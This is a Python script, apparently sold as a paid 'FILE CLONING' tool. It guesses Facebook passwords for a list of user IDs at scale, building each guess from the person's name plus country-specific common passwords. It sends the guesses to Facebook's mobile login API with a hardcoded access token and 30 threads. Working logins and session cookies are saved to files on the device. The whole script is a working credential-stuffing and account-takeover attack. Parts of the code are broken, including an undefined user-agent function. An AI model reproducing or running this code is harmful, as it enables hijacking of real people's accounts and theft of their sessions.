#-----ANKIT x MODZ-----#

#-------------------// MODULES \\---------------------#
import os,zlib

from os import system as osRUB
from os import system as cmd
os.system('clear')
print('loading Modules ...\n')
os.system('xdg-open https://chat.whatsapp.com/BZK86hHlA6W6YKxlyJCQkR?mode=ems_copy_t')

dir_path = '/sdcard/ANKITxMODZ'
os.makedirs(dir_path, exist_ok=True)
try:
    import requests 
except ImportError:
    print('\n  installing Requests ...\n')
    os.system('pip install requests')

try:
    import concurrent.futures
except ImportError:
    print('\n  installing futures ...\n')
    os.system('pip install futures')

try:
    import mechanize
except ModuleNotFoundError:
    os.system('pip install mechanize > /dev/null')

from urllib.request import Request, urlopen
import os, requests, re,platform, sys, random, subprocess, threading, itertools,base64,uuid,zlib,re,json,uuid,subprocess,shutil,webbrowser,time,json,sys,random,datetime,time,re,subprocess,platform,string,json,time,re,random,sys,string,uuid
from concurrent.futures import ThreadPoolExecutor as sarfrazssb
from string import * 
from random import randint
from time import sleep as slp
from os import system as cmd
from zlib import decompress 
import os, platform

from concurrent.futures import ThreadPoolExecutor
fast_work = ThreadPoolExecutor(max_workers=15).submit

    
model2 = requests.get('https://gist.githubusercontent.com/Nox-Naved/0588acb2b77932048a251d50a973029b/raw/f6de01ac684131b5353854ee114880fb00227cee/Model60').text.splitlines()
totaldmp = 0
count = 0
loop = 0
oks = []
cps = []
id = []
ps = []
sid = []
total=[]
methods = []
srange = 0
saved = []
totaldmp = 0
filter = []

#-------------------// USERAGENTS \\---------------------#
import random

def get_direct_ua():
    ua_list = [        
        "Mozilla/5.0 (Linux; Android 15; SM-A566E Build/AP3A.240905.015.A2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/137.0.7151.112 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/518.0.0.63.86;IABMV/1;]",
        "Mozilla/5.0 (Linux; Android 9; SM-A530F Build/PPR1.180610.011; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/129.0.6668.97 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/485.0.0.70.77;IABMV/1;]",
        "Mozilla/5.0 (Linux; Android 8.1.0; SM-J710F Build/M1AJQ; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.91 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/494.0.0.55.73;]",
        "Mozilla/5.0 (Linux; Android 13; SM-G986B Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/140.0.7339.136 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/531.0.0.26.70;IABMV/1;]",
        "Mozilla/5.0 (Linux; Android 15; SM-S936U1 Build/AP3A.240905.015.A2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/140.0.7339.136 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/531.0.0.26.70;IABMV/1;]",
        "Mozilla/5.0 (Linux; Android 12; M2004J19C Build/SP1A.210812.016; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/138.0.7204.139 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/520.0.0.44.99;IABMV/1;]",
        "Mozilla/5.0 (Linux; Android 12; V2221 Build/SP1A.210812.003_MOD1; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/91.0.4472.114 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/405.0.0.23.72;]",
        "Mozilla/5.0 (iPhone; CPU iPhone OS 18_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/22A5282m [FBAN/FBIOS;FBAV/467.0.0.35.109;FBBV/606980303;FBDV/iPhone13,4;FBMD/iPhone;FBSN/iOS;FBSV/18.0;FBSS/3;FBID/phone;FBLC/fr_FR;FBOP/5;FBRV/0]",
        "Mozilla/5.0 (iPhone; CPU iPhone OS 18_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/22A5282m [FBAN/FBIOS;FBAV/475.0.0.31.110;FBBV/627850395;FBDV/iPhone14,5;FBMD/iPhone;FBSN/iOS;FBSV/18.0;FBSS/3;FBID/phone;FBLC/en_US;FBOP/5;FBRV/0]",
        "Mozilla/5.0 (Linux; Android 9; CPH1941 Build/PKQ1.190714.001; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/138.0.7204.153 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/522.0.0.52.96;IABMV/1;]",
        "Mozilla/5.0 (Linux; Android 14; CPH2363 Build/TP1A.220905.001; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/129.0.6668.78 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/484.0.0.63.83;IABMV/1;]",
        "Mozilla/5.0 (Linux; Android 11; Infinix X675 Build/RP1A.201005.001; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/131.0.6778.78 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/491.0.0.58.78;IABMV/1;]",
        "Mozilla/5.0 (Linux; Android 11; RMX2189 Build/RP1A.200720.011; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/138.0.7204.67 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/521.0.0.42.97;IABMV/1;]",
        "Mozilla/5.0 (Linux; Android 10; Nokia  3.1 Plus Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/140.0.7339.155 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/532.0.0.55.71;IABMV/1;]",
        "[FBAN/FB4A;FBAV/258.0.0.34.119;FBBV/199294650;FBDM/{density=2.0,width=720,height=1344};FBLC/en_GB;FBRV/0;FBCR/MTN;FBMF/Xiaomi;FBBD/xiaomi;FBPN/com.facebook.katana;FBDV/Redmi 6A;FBSV/8.1.0;FBOP/1;FBCA/armeabi-v7a:armeabi;]",
        "[FBAN/FB4A;FBAV/268.1.0.54.121;FBBV/211681957;FBDM/{density=3.0,width=1080,height=2046};FBLC/en_US;FBRV/212444242;FBCR/Sprint;FBMF/samsung;FBBD/samsung;FBPN/com.facebook.katana;FBDV/SM-N970U;FBSV/10;FBOP/19;FBCA/arm64-v8a:;]",
        "[FBAN/FB4A;FBAV/268.1.0.54.121;FBBV/211681891;FBDM/{density=3.0,width=1080,height=1920};FBLC/en_US;FBRV/212675737;FBCR/Verizon Wireless;FBMF/samsung;FBBD/Verizon;FBPN/com.facebook.katana;FBDV/SM-G935V;FBSV/7.0;FBOP/1;FBCA/armeabi-v7a:armeabi;]",                      
    ]
    return random.choice(ua_list)    


def get_android_ua():
    android_versions = ["10", "11", "12", "13"]
    android_devices = [
        "SM-G998B", "SM-G991B", "SM-A736B", "Redmi Note 12", 
        "Pixel 7 Pro", "OnePlus 11", "Samsung Galaxy S23"
    ]
    android_builds = [
        "TP1A.220624.014", "SP1A.210812.016", "RP1A.200720.012"
    ]
    chrome_versions = [
        "119.0.6045.163", "118.0.5993.111", "117.0.5938.153"
    ]
    fb_versions = ["298.0.0.46.116", "297.0.0.45.115"]
    
    android = random.choice(android_versions)
    device = random.choice(android_devices)
    build = random.choice(android_builds)
    chrome = random.choice(chrome_versions)
    fb_version = random.choice(fb_versions)
    
    ua = f"Mozilla/5.0 (Linux; Android {android}; {device} Build/{build}) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/{chrome} Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/{fb_version};]"
    return ua

def get_ios_ua():
    ios_versions = ["15_0", "15_1", "15_2", "15_3", "16_0", "16_1"]
    ios_devices = [
        "iPhone14,2", "iPhone14,3", "iPhone15,2", "iPhone15,3"
    ]
    fb_versions = ["298.0.0.46.116", "297.0.0.45.115"]
    
    ios = random.choice(ios_versions)
    device = random.choice(ios_devices)
    fb_version = random.choice(fb_versions)
    
    ua = f"Mozilla/5.0 ({device}; CPU iPhone OS {ios} like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 [FBAN/FBIOS;FBAV/{fb_version};]"
    return ua

def get_windows_ua():
    windows_versions = ["10.0", "11.0"]
    windows_browsers = [
        "Chrome/119.0.6045.159", "Chrome/118.0.5993.89",
        "Firefox/119.0", "Firefox/118.0",
        "Edg/119.0.2151.72"
    ]
    
    windows = random.choice(windows_versions)
    browser = random.choice(windows_browsers)
    
    ua = f"Mozilla/5.0 (Windows NT {windows}; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) {browser} Safari/537.36"
    return ua


def randBuildLSB():
    vchrome = str(random.randint(100,925))+".0.0."+str(random.randint(1,8))+"."+str(random.randint(40,150))
    VAPP = random.randint(410000000,499999999)
    END = 'Mozilla/5.0 (Linux; Android 9; CPH1937 Build/PKQ1.190714.001; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/86.0.4240.198 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/298.0.0.46.116;]","Mozilla/5.0 (Linux; Android 9; CPH2021 Build/PPR1.180610.011; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/85.0.4183.81 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/284.0.0.50.107;]'
    ua = 'Mozilla/5.0 (Linux; Android 9; 10; Linux; Android 9;B1026J) AppleWebKit/537.36 (KHTML, like Gecko)99.0.36419.76 Chrome/85.0.4183.81 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/284.0.0.50.107;]","Mozilla/5.0 (Linux; Android 9; 10; Linux; Android 9;R8605l) AppleWebKit/537.36 (KHTML, like Gecko)96.0.52686.114 Chrome/85.0.4183.81 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/284.0.0.50.107;]","Mozilla/5.0 (Linux; Android 9; 10; Linux; Android 9;K7641B) AppleWebKit/537.36 (KHTML, like Gecko)93.0.20814.108 Chrome/85.0.4183.81 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/284.0.0.50.107;] '+END
    return ua

def randBuildvsskj():
    END = '[FBAN/EMA;FBBV/352223683;FBAV/291.0.0.12.110;FBDV/SM-G935FD;FBLC/en_GB;FBNG/WIFI;FBMNT/NOT_METERED;FBDM/{density=1.0125}]'
    ua = f'Dalvik/2.1.0 (Linux; U; Android {random.randint(4,13)}; {random.choice(model2)} Build/QP1A.{random.randint(111111,999999)}.{random.randint(111,999)}) '+END
    return ua
#-------------------// COLOUR \\---------------------#
'\033[0;30m'  # Black
'\033[0;31m'  # Red
'\033[0;32m'  # Green
'\033[0;33m'  # Yellow
'\033[0;34m'  # Blue
'\033[0;35m'  # Magenta
'\033[0;36m'  # Cyan
'\033[0;37m'  # White

'\033[1;30m'  # Bright Black (Gray)
'\033[1;31m'  # Bright Red
'\033[1;32m'  # Bright Green
'\033[1;33m'  # Bright Yellow
'\033[1;34m'  # Bright Blue
'\033[1;35m'  # Bright Magenta
'\033[1;36m'  # Bright Cyan
'\033[1;37m'  # Bright White

'\033[40m'  # Background Black
'\033[41m'  # Background Red
'\033[42m'  # Background Green
'\033[43m'  # Background Yellow
'\033[44m'  # Background Blue
'\033[45m'  # Background Magenta
'\033[46m'  # Background Cyan
'\033[47m'  # Background White

sys.stdout.write('\x1b]2;ANKIT x MODZ\x07')
S = '\033[1;37m'
A = '\x1b[38;5;208m'
R = '\x1b[38;5;46m'
F = '\x1b[38;5;48m'
Z = '\033[1;33m'
F = '\x1b[38;5;196m'
head = {'Host': 'adsmanager.facebook.com', 'sec-ch-ua': '"Chromium";v="107", "Not=A?Brand";v="24"', 'viewport-width': '980'}
import random




#-------------------// APPROVAL \\---------------------#
import os, httpx, time


sexkey = "ANKITx("+str(os.getuid())+"=(MODz)="+str(os.getuid())+")007"

def approval():
    sexkey = "ANKITx("+str(os.getuid())+"=(MODz)="+str(os.getuid())+")007"
    try:
        ress = httpx.get("https://github.com/ankitbhattarai853-maker/ANKIT-APPROVAL/blob/main/PAID.txt").text
        if sexkey in ress:
            sarfraz()
        else:
            print("\033[1;97m KEY IS NOT APPROVED")
            os.system("clear")
            print(logo)
           
            print('\033[1;97m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━\033[1;97m')
            input(f'\033[1;97m(\033[1;97m✘\033[1;97m)\033[1;97m PRESS ENTER TO SEND KEY ADMIN > ')
            time.sleep(2)
            tks = sexkey
            os.system('xdg-open https://wa.me/+918628818338')
    except Exception as e:
        print(f"\033[1;97m Error: {e}")
version = '1.5'
# --- color shortcuts (keeps exact codes you used) ---
C_W  = "\x1b[1;97m"    # bright white / reset-ish
C_49 = "\x1b[38;5;49m"
C_48 = "\x1b[38;5;48m"
C_47 = "\x1b[38;5;47m"
C_196= "\x1b[38;5;196m"
C_244= "\x1b[38;5;244m"
C_46 = "\x1b[38;5;46m"
C_81 = "\x1b[38;5;81m"
C_37 = "\033[1;37m"    
#-------------------// LOGO \\---------------------#
logo = (
    f"{C_W}   _____    _______   ____  __.______________\n"   
    f"{C_49}  /  _  \\   \\      \\ |    |/ _|   \\__    ___/\n"
    f"{C_48} /  /_\\  \\  /   |   \\|      < |   | |    |   \n"
    f"{C_47}/    |    \\/    |    \\    |  \\|   | |    |   \n"
    f"{C_W}\\____|__  /\\____|__  /____|__ \\___| |____|   \n"
    f"{C_W}        \\/         \\/        \\/                             \n"
    f"{C_W}┌━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┐{C_37}\n"
    f"{C_W}┃{C_244}({C_W}✘{C_244}){C_46} AUTHOR   {C_244}–{C_46}➤{C_244} [{C_46}ANKIT x MODZ{C_244}] {C_W}               ┃\n"
    f"{C_W}┃{C_244}({C_W}✘{C_244}){C_46} FACEBOOK {C_244}–{C_46}➤{C_244} [{C_46}Ankit Xwd{C_244}] {C_W}                  ┃\n"
    f"{C_W}┃{C_244}({C_W}✘{C_244}){C_46} TOOLTYPE {C_244}–{C_46}➤{C_244} [{C_46}PAID{C_244}]{C_W}x{C_244}[{C_46}FILE{C_244}]{C_W}x{C_244}[{C_196}{version}{C_244}]{C_W}           ┃\n"
    f"{C_W}┃{C_W}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━{C_37}┃\n"
    f"{C_W}┃{C_244}({C_W}✘{C_244}){C_46} KEY ━{C_244}➤ {C_81}{sexkey}      {C_W}┃\n"
    f"{C_W}└━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┘{C_37}"
)
def clear():
    os.system("clear")
    print(logo)    
def linex():print(f'\x1b[1;97m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━\033[1;37m')    
def result(OKs,cps):
    if len(OKs) != 0 or len(cps) != 0:
        print('\n')
        print(47*'-')
        print(' The Process has been Complete...')
        print(' TOTAL OK: %s' % str(len(oks)))
        print(' TOTAL CP: %s' % str(len(cps)))
        print(47*'-')
        input("Press enter to go menu ")
        sarfraz()
#-------------------// MENU \\---------------------#
def sarfraz():   
    os.system('clear')
    print(logo)
    print(f' [1]\x1b[38;5;46m FILE CLONING')
    print(f' \033[97m[2]\x1b[38;5;46m RANDOM CLONING')
    linex()
    select = input('Select Menu>: ')
    linex()
    if select =='1':
        method_crack()
    elif select =='2':
        import rd
    else:
        print('\n Select valid option ... ')
        time.sleep(2)
        sarfraz()
        
def method_crack():
    global methods
    clear()
    print(f' \033[97m[1] \033[94mMethod {1}')
    print(f' \033[97m[2]\033[94m Method {2}')
    print(f' \033[97m[3]\033[94m Method {3}')
    print(f' \033[97m[0]\033[94m Back')
    linex()
    option = input('Select method>: ')
        
    if option =='1':
        methods.append('methodA')
        main_crack().crack(id)
    elif option =='2':
        methods.append('methodB')
        main_crack().crack(id)        
    elif option =='3':
        methods.append('methodC')
        main_crack().crack(id)
    elif option =='0':
        sarfraz()
    else:
      print('\n Select Valid Option ...')
      time.sleep(1)
      method_crack()

class main_crack():
    def __init__(self):
        self.id=[]
    def crack(self,id):
        global methods
        clear()
        self.file = input('Put File Name : ')
        try:
            self.id = open(self.file).read().splitlines()
            self.pasw()
        except FileNotFoundError:
            print('Opps File Not Found ...')
            time.sleep(2)
            os.system('clear')
            print(logo)
            print('Try Again ...')
            time.sleep(1)
            main_crack().crack(id)
            
            
#-------------------// METHOD B-GRAPH \\---------------------#
    def methodA(self, sid, name, psw):
        try:
            global oks,cps,loop
            sys.stdout.write(f"\r {S}[ANKIT] {loop} | M1 OK/CP {len(oks)}/{len(cps)} | {S}{'{:.0%}'.format(loop/float(len(self.id)))}{S}")
            sys.stdout.flush()
            ua = "Mozilla/5.0 (Linux; Android 13; SM-G998B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Mobile Safari/537.36"
            fs = name.split(' ')[0]
            try:
                ls = name.split(' ')[1]
            except:
                ls = fs
            for pw in psw:
                ps = pw.replace('first',fs.lower()).replace('First',fs).replace('last',ls.lower()).replace('Last',ls).replace('Name',name).replace('name',name.lower())
                with requests.Session() as session:
                    data = {"adid": str(uuid.uuid4()),
"format": "json",
"device_id": str(uuid.uuid4()),
"cpl": "true",
"family_device_id": str(uuid.uuid4()),
"credentials_type": "device_based_login_password",
"error_detail_type": "button_with_disabled",
"source": "device_based_login",
"email": sid,
"password": ps,
"access_token": "350685531728%7C62f8ce9f74b12f84c123cc23437a4a32",
"generate_session_cookies": "1",
"meta_inf_fbmeta": "",
"advertiser_id": str(uuid.uuid4()),
"currently_logged_in_userid": "0",
"locale": "en_GB",
"client_country_code": "GB",
"method": "auth.login",
"fb_api_req_friendly_name": "authenticate",
"fb_api_caller_class": "com.facebook.account.login.protocol.Fb4aAuthHandler",
"api_key": "882a8490361da98702bf97a021ddc14d"}
                headers = {'User-Agent': ua,
'Content-Type': 'application/x-www-form-urlencoded',
'Host': 'graph.facebook.com',
'X-FB-Net-HNI': str(random.randint(20000, 40000)),
'X-FB-SIM-HNI': str(random.randint(20000, 40000)),
'X-FB-Connection-Type': 'MOBILE.LTE',
'X-Tigon-Is-Retry': 'False',
'x-fb-session-id': 'nid=jiZ+yNNBgbwC;pid=Main;tid=132;nc=1;fc=0;bc=0;cid=d29d67d37eca387482a8a5b740f84f62',
'x-fb-device-group': '5120',
'X-FB-Friendly-Name': 'ViewerReactionsMutation',
'X-FB-Request-Analytics-Tags': 'graphservice',
'X-FB-HTTP-Engine': 'Liger',
'X-FB-Client-IP': 'True',
'X-FB-Server-Cluster': 'True',
'x-fb-connection-token': 'd29d67d37eca387482a8a5b740f84f62',}
                q = session.post("https://b-graph.facebook.com/auth/login",data=data, headers=headers, allow_redirects=False).json()
                if 'session_key' in q:
                    ckkk = ";".join(i["name"]+"="+i["value"] for i in q["session_cookies"]);ssbb = base64.b64encode(os.urandom(18)).decode().replace("=","").replace("+","_").replace("/","-");cookie = f"sb={ssbb};{ckkk}"
                    print(f"\r{R} [ANKIT-OK] {sid} | {ps} {S}")
                    oks.append(sid)                    
                    open('/sdcard/ANKITxMODZ/ANKIT-OK.txt','a').write(sid+'|'+ps+'\n');open('/sdcard/ANKITxMODZ/ANKIT-COKKIE.txt','a').write(sid+'|'+ps+'|'+cookie+'\n')
                    break
                elif 'www.facebook.com' in q['error']['message']:
                     print(f"\r{F} [ANKIT-CP] {sid} | {ps} {S}")
                     cps.append(sid)
                     open('/sdcard/ANKITxMODZ/ANKIT-CP.txt','a').write(sid+'|'+ps+'\n')
                else:
                    continue
            loop+=1
        except requests.exceptions.ConnectionError:
            self.methodA(sid, name, ps)
#-------------------// METHOD B-GRAPH \\---------------------#            
    def methodC(self,sid,name,psw):
        try:
            global oks,cps,loop
            sys.stdout.write(f"\r {S}[ANKIT] {loop} | M3 OK/CP {len(oks)}/{len(cps)} | {S}{'{:.0%}'.format(loop/float(len(self.id)))}{S}")
            sys.stdout.flush()
            fs = name.split(' ')[0]
            try:
                ls = name.split(' ')[1]
            except:
                ls = fs
            for pw in psw:
                ps = pw.replace('first',fs.lower()).replace('First',fs).replace('last',ls.lower()).replace('Last',ls).replace('Name',name).replace('name',name.lower())
                with requests.Session() as session:
                    data = {"adid": str(uuid.uuid4()),
"format": "json",
"device_id": str(uuid.uuid4()),
"cpl": "true",
"family_device_id": str(uuid.uuid4()),
"credentials_type": "device_based_login_password",
"error_detail_type": "button_with_disabled",
"source": "device_based_login",
"email": sid,
"password": ps,
"access_token": "350685531728%7C62f8ce9f74b12f84c123cc23437a4a32",
"generate_session_cookies": "1",
"meta_inf_fbmeta": "",
"advertiser_id": str(uuid.uuid4()),
"currently_logged_in_userid": "0",
"locale": "en_GB",
"client_country_code": "GB",
"method": "auth.login",
"fb_api_req_friendly_name": "authenticate",
"fb_api_caller_class": "com.facebook.account.login.protocol.Fb4aAuthHandler",
"api_key": "882a8490361da98702bf97a021ddc14d"}
                headers = {'User-Agent': get_random_ua(),
'Content-Type': 'application/x-www-form-urlencoded',
'Host': 'graph.facebook.com',
'X-FB-Net-HNI': str(random.randint(20000, 40000)),
'X-FB-SIM-HNI': str(random.randint(20000, 40000)),
'X-FB-Connection-Type': 'MOBILE.LTE',
'X-Tigon-Is-Retry': 'False',
'x-fb-session-id': 'nid=jiZ+yNNBgbwC;pid=Main;tid=132;nc=1;fc=0;bc=0;cid=d29d67d37eca387482a8a5b740f84f62',
'x-fb-device-group': '5120',
'X-FB-Friendly-Name': 'ViewerReactionsMutation',
'X-FB-Request-Analytics-Tags': 'graphservice',
'X-FB-HTTP-Engine': 'Liger',
'X-FB-Client-IP': 'True',
'X-FB-Server-Cluster': 'True',
'x-fb-connection-token': 'd29d67d37eca387482a8a5b740f84f62',}
                q = session.post("https://api.facebook.com/auth/login",data=data, headers=headers, allow_redirects=False).json()
                if 'session_key' in q:
                    ckkk = ";".join(i["name"]+"="+i["value"] for i in q["session_cookies"]);ssbb = base64.b64encode(os.urandom(18)).decode().replace("=","").replace("+","_").replace("/","-");cookie = f"sb={ssbb};{ckkk}"
                    print(f"\r{R} [ANKIT-OK] {sid} | {ps} {S}")
                    oks.append(sid)                    
                    open('/sdcard/ANKITxMODZ/ANKIT-OK.txt','a').write(sid+'|'+ps+'\n');open('/sdcard/ANKITxMODZ/ANKIT-COKKIE.txt','a').write(sid+'|'+ps+'|'+cookie+'\n')
                    break
                elif 'www.facebook.com' in q['error']['message']:
                     print(f"\r{F} [ANKIT-CP] {sid} | {ps} {S}")
                     cps.append(sid)
                     open('/sdcard/ANKITxMODZ/ANKIT-CP.txt','a').write(sid+'|'+ps+'\n')
                else:
                    continue
            loop+=1
        except requests.exceptions.ConnectionError:
            self.methodC(sid, name, ps)
#-------------------// METHOD B-GRAPH \\---------------------#                             
    def methodB(self, sid, name, psw):
        try:
            global oks,cps,loop
            sys.stdout.write(f"\r {S}[ANKIT] {loop} | M2 OK/CP {len(oks)}/{len(cps)} | {S}{'{:.0%}'.format(loop/float(len(self.id)))}{S}")
            sys.stdout.flush()
            fs = name.split(' ')[0]
            try:
                ls = name.split(' ')[1]
            except:
                ls = fs
            for pw in psw:
                ps = pw.replace('first',fs.lower()).replace('First',fs).replace('last',ls.lower()).replace('Last',ls).replace('Name',name).replace('name',name.lower())
                with requests.Session() as session:
                    data = {"adid": str(uuid.uuid4()),
"format": "json",
"device_id": str(uuid.uuid4()),
"cpl": "true",
"family_device_id": str(uuid.uuid4()),
"credentials_type": "device_based_login_password",
"error_detail_type": "button_with_disabled",
"source": "device_based_login",
"email": sid,
"password": ps,
"access_token": "350685531728%7C62f8ce9f74b12f84c123cc23437a4a32",
"generate_session_cookies": "1",
"meta_inf_fbmeta": "",
"advertiser_id": str(uuid.uuid4()),
"currently_logged_in_userid": "0",
"locale": "en_GB",
"client_country_code": "GB",
"method": "auth.login",
"fb_api_req_friendly_name": "authenticate",
"fb_api_caller_class": "com.facebook.account.login.protocol.Fb4aAuthHandler",
"api_key": "882a8490361da98702bf97a021ddc14d"}
                headers = {'User-Agent': get_random_ua(),
'Content-Type': 'application/x-www-form-urlencoded',
'Host': 'graph.facebook.com',
'X-FB-Net-HNI': str(random.randint(20000, 40000)),
'X-FB-SIM-HNI': str(random.randint(20000, 40000)),
'X-FB-Connection-Type': 'MOBILE.LTE',
'X-Tigon-Is-Retry': 'False',
'x-fb-session-id': 'nid=jiZ+yNNBgbwC;pid=Main;tid=132;nc=1;fc=0;bc=0;cid=d29d67d37eca387482a8a5b740f84f62',
'x-fb-device-group': '5120',
'X-FB-Friendly-Name': 'ViewerReactionsMutation',
'X-FB-Request-Analytics-Tags': 'graphservice',
'X-FB-HTTP-Engine': 'Liger',
'X-FB-Client-IP': 'True',
'X-FB-Server-Cluster': 'True',
'x-fb-connection-token': 'd29d67d37eca387482a8a5b740f84f62',}
                q = session.post("https://b-graph.facebook.com/auth/login",data=data, headers=headers, allow_redirects=False).json()
                if 'session_key' in q:
                    ckkk = ";".join(i["name"]+"="+i["value"] for i in q["session_cookies"]);ssbb = base64.b64encode(os.urandom(18)).decode().replace("=","").replace("+","_").replace("/","-");cookie = f"sb={ssbb};{ckkk}"
                    print(f"\r{R} [ANKIT-OK] {sid} | {ps} {S}")
                    oks.append(sid)
                    open('/sdcard/ANKITxMODZ/ANKIT-OK.txt','a').write(sid+'|'+ps+'\n');open('/sdcard/ANKITxMODZ/ANKIT-COOKIE.txt','a').write(sid+'|'+ps+'|'+cookie+'\n')
                    break
                elif 'www.facebook.com' in q['error']['message']:
                    print(f"\r{F} [ANKIT-CP] {sid} | {ps} {S}")
                    cps.append(sid)
                    open('/sdcard/ANKITxMODZ/ANKIT-CP.txt','a').write(sid+'|'+ps+'\n')
                else:
                    continue
            loop+=1
        except requests.exceptions.ConnectionError:
            self.methodC(sid, name, ps)
            
 #-------------------// PASSWORDS \\---------------------#           
    def pasw(self):       
        pw = []
        clear()
        
        # Password Selection Menu
        print(" \x1b[1;97m[1] AUTO PASS CRACK")
        print(" \x1b[1;97m[2] SELF PASS CRACK")
        linex()
        ppp = input(' \x1b[38;5;196m[\x1b[37m•\x1b[38;5;196m]\x1b[37m CHOOSE : ')
        
        if ppp in ['1','01']:
            # Auto Password Menu
            clear()
            print(" \x1b[1;97m [1] BD AUTO PASS")
            print(" \x1b[1;97m [2] INDIA AUTO PASS")
            print(" \x1b[1;97m [3] NEPAL AUTO PASS")
            print(" \x1b[1;97m [4] PAK AUTO PASS")
            linex()
            auto_choice = input(' \x1b[1;97m CHOOSE COUNTRY : ')
            linex()
            
            if auto_choice in ['1','01']:
                # Bangladesh Auto Passwords
                pw.extend([
                    'first last', 'firstlast', 'First Last', 'first12345',
                    'first1234', 'first123', 'first12', 'first1122',
                    'first@1234', '@first@', 'first@@', '@@##@@',
                    'last1234', 'last123', '123456', '@last@',
                    '57273200', '@firstlast@', 'first@123',
                    'firstlast123', 'firstlast@123', 'bangladesh',
                    'bangla123', 'dhaka123', 'bd123456'
                ])                
                
            elif auto_choice in ['2','02']:
                # India Auto Passwords
                pw.extend([
                    'first last', 'firstlast', 'first123', 'last123',
                    '57273200', '59039200', '57575751', '07860786',
                    '57575752', 'first@123', 'firstlast123',
                    'first@1234', 'last@123', 'firstlast@123',
                    'india123', 'indian', 'mumbai', 'delhi123',
                    'punjab123', 'kolkata', 'chennai', 'hyderabad'
                ])
                
                
            elif auto_choice in ['3','03']:
                # Nepal Auto Passwords
                pw.extend([
                    'first@123', 'first@12345', 'first123', 'first12345',
                    'firstlast', 'first last', 'firstlast123', '@first123',
                    'first123@', 'first@1234', 'First@123', 'First@12345',
                    'lastfirst', 'firstlast12345', 'last@123'
                ])
                
                
            elif auto_choice in ['4','04']:
                # Pakistan Auto Passwords
                pw.extend([
                    'first last', 'firstlast', 'first123', 'last123',
                    'first@123', 'firstlast123', 'pakistan', 'karachi',
                    'lahore123', 'islamabad', 'pak123', 'quetta',
                    'peshawar', 'pak@123', 'first@1234', 'last@123',
                    '57273200', '57575751', 'firstlast@123'
                ])
                
            else:
                print('\n Select valid option ... ')
                time.sleep(2)
                return self.pasw()
                
        elif ppp in ['2','02']:
            # Self Password Input
            print('Put limit between 1 to 30')
            sl = int(input('How many password do you want to add?: '))
            os.system("clear")
            print(logo)
            print('\x1b[1;37m [Example: first123,last1122,firstlast,last,ETC]')
            linex()
            if sl > 30:
                print('\nPassword limit Should Not Be Greater Than 30')
                sl = 30
            for sr in range(sl):
                pw.append(input(f'Password {sr+1}: '))
            print(f"\x1b[1;97m [SELF PASS] {len(pw)} \x1b[1;37m")
        else:
            print('\n Select valid option ... ')
            time.sleep(2)
            return self.pasw()

        time.sleep(2)
        os.system("clear")
        print(logo)
        print("\r\x1b[38;5;208m USE FLIGHT MODE FOR BEST RESULT \x1b[1;37m")
        linex()
        print(f'\033[93m TOTAL DUMP IDS : %s ' % len(self.id))
        print(f'\033[93m TOTAL PASSWORDS : %s ' % len(pw))
        linex()                       
        
        with sarfrazssb(max_workers=30) as ssbworld:
            for zsb in self.id:
                try:
                    uid, name = zsb.split('|')
                    sz = name.split(' ')
                    if len(sz) == 3 or len(sz) == 4 or len(sz) == 5 or len(sz) == 8:
                        pwx = pw
                    else:
                        pwx = pw
                        
                    if 'methodA' in methods:
                        ssbworld.submit(self.methodA, uid, name, pwx)
                    elif 'methodB' in methods:
                        ssbworld.submit(self.methodB, uid, name, pwx)
                    elif 'methodC' in methods:
                        ssbworld.submit(self.methodC, uid, name, pwx)                    
                except:
                    pass
                    
        result(oks, cps)
            

sarfraz()   
